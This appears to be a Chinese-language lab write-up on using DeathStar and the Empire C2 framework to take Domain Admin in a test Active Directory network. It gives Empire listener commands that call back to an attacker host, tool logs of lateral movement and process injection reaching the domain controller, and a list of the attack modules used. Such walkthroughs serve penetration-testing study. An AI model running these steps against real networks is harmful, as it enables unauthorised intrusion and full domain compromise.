DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar
环境介绍
- web服务——windows 2008 r2——192.168.138.141
- 客户端——windows 2003 r2——192.168.138.128
- 域控——windows 2008 r2——192.168.138.140
- 攻击——kali,安装了
empire和DeathStar
新建一个普通域用户test,登陆到
注意: 需要手动修改empire框架中的监听器DeathStar,重启监听器以便让新配置生效
(Empire: listeners) > edit DeathStar Host http://192.168.138.136:8080
(Empire: listeners) > edit DeathStar Port 8080
(Empire: listeners) > disable DeathStar
(Empire: listeners) > enable DeathStar
开始
DeathStar通过rest与empire连接,当empire有一个agent回连之后,DeathStar就开始工作了。
然而因为测试环境中出现的超长用户名,导致DeathStar出错,简单处理下异常代码就可以接着跑了(图略)。
注意:因为普通的域用户权限很低,无法进行凭据读取的操作,第一次失败了。
于是将域用户test加入到windows2003和windows2008的本机管理员组,再执行一遍。
在window2003(192.168.138.128)上获取域环境信息,并尝试获取本机已有的凭据。
[+] New Agent => Name: MTLV2E6X IP: 192.168.138.128 HostName: WIN2003 UserName: PENTEST\test HighIntegrity: 1
[*] Agent: MTLV2E6X => Starting recon
[+] Agent: MTLV2E6X => Got domain SID: S-1-5-21-3356271140-971267009-3247355629
[+] Agent: MTLV2E6X => Found 1 members of the Domain Admins group: ['PENTEST\\Administrator']
[+] Agent: MTLV2E6X => Found 1 Domain Controllers: ['dc.pentest.com']
[+] Agent: MTLV2E6X => Found 0 active admin sessions: []
[+] Agent: MTLV2E6X => Found 4 users logged into localhost: ['WIN2003\\web1545978444188', 'WIN2003\\web1545980367000', 'WIN2003\\web1545978429531', 'PENTEST\\test']
[*] Agent: MTLV2E6X => Starting lateral movement
[*] Agent: MTLV2E6X => Starting domain privesc
[+] Agent: MTLV2E6X => Enumerated 1 processes
[*] Agent: MTLV2E6X => Spawning new Agent using CredID 6
[*] Agent: MTLV2E6X => Spawning new Agent using CredID 7
[+] Agent: MTLV2E6X => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] Agent: MTLV2E6X => Current security context has admin access to 2 hosts
利用wmi横移到windows2008(192.168.138.141)上面。发现并注入到域管理员运行的进程。
[DEBUG] Agent: MTLV2E6X => Executed Module => success: True taskID: 11 msg: 'tasked agent MTLV2E6X to run module powershell/lateral_movement/invoke_wmi'
[+] New Agent => Name: 24REVLAS IP: 192.168.138.141 HostName: WEB UserName: PENTEST\test HighIntegrity: 1
[+] Agent: 24REVLAS => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
[+] Agent: 24REVLAS => Found Domain Admin logged in: PENTEST\Administrator
[*] Agent: 24REVLAS => Starting domain privesc
[+] Agent: 24REVLAS => Enumerated 1 processes
[*] Agent: 24REVLAS => Found process 1644 running under PENTEST\administrator
[*] Agent: 24REVLAS => PSInjecting into process 1644
注入成功之后产生一个新的agent,为域管理员权限,可以进入3台主机
[+] Agent: 24REVLAS => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] New Agent => Name: 5F2CHEDZ IP: 192.168.138.141 HostName: WEB UserName: PENTEST\administrator HighIntegrity: 1
[+] Agent: 5F2CHEDZ => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
[+] Agent: 5F2CHEDZ => Found Domain Admin logged in: PENTEST\Administrator
[*] Agent: 5F2CHEDZ => Starting lateral movement
[*] Agent: 5F2CHEDZ => Starting domain privesc
[+] Agent: 5F2CHEDZ => Enumerated 1 processes
[+] Agent: 5F2CHEDZ => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] Agent: 5F2CHEDZ => Current security context has admin access to 3 hosts
成功登陆域控服务器
[+] New Agent => Name: WY9A1DC7 IP: 192.168.138.140 HostName: DC UserName: PENTEST\Administrator HighIntegrity: 1
[+] Agent: WY9A1DC7 => Got Domain Admin via security context - agent using domain admin account in high integrity process!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
获取的agent,有先后顺序
换个方式横移——GPO
组策略的所有配置信息都存放在GPO(Group Policy Object,组策略对象)中,组策略被视为Active Directory中的一种特殊对象,可以将GPO和活动目录的容器(站点、域和OU)连接起来,以影响容器中的用户和计算机。组策略是通过组策略对象来进行管理的。
统一设置了每台服务器的本机管理员(uid500)的密码,并将域用户test从本机管理员组踢出。
empire关闭所有agent,creds remove all清除已保存的凭据。
因为进程注入需要一个存活的域用户进程,而windows2003没法快速切换用户,所以这次从windows2008开始漫游。
可惜的是因为empire的问题漫游终止了。
查看agent的job,这里获取的是域策略设置的本机管理员密码,而域里面的每台主机不一定会执行这个策略,所以需要一个empire模块get_gpo_computer.py来获取执行了策略的主机,查看哪些主机是域管理员登陆过的,再横移过去。
总结
可以查看DeathStar里面的代码,依次执行了什么empire的哪些模块,再单独手工操练。
powershell/management/get_domain_sidpowershell/situational_awareness/network/powerview/get_group_memberpowershell/situational_awareness/network/powerview/get_domain_controllerpowershell/situational_awareness/network/powerview/user_hunterpowershell/situational_awareness/network/powerview/get_loggedonpowershell/privesc/gpppowershell/privesc/bypassuac_eventvwr-
powershell/situational_awareness/network/powerview/find_localadmin_access
等等
网友评论